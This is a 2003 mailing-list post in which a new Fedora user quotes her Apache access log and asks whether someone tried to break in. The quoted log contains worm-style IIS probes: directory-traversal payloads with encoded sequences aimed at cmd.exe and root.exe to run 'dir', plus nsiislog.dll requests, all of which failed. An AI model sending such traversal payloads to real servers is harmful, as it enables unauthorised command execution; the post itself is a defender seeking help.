attacked? hacked? help.....!

Lisa Durham lisa at natec.net
Tue Dec 9 05:26:52 UTC 2003


I am very new to Linux but was poking around in my newly setup Fedora 
Core 1 system today and came upon the lines below in the Apache Access 
Log when I used the "System Logs" icon in the System Tools Menu.

Is the IP at the beginning of each line the IP that requested the file 
that is shown at the end of the line, with the date and time in the 
center? If this isn't what's shown in this file, what is this format? 
What does this file tell me? Am I paranoid, or was someone trying to 
access my machine (but ignorantly assuming it was a Windows machine)?


Quoted Apache access log:

24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET 
/scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 
"-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET 
/scripts/nsiislog.dll" 404 331 "-" "-"

----------------------------------------

Thanks,
Lisa




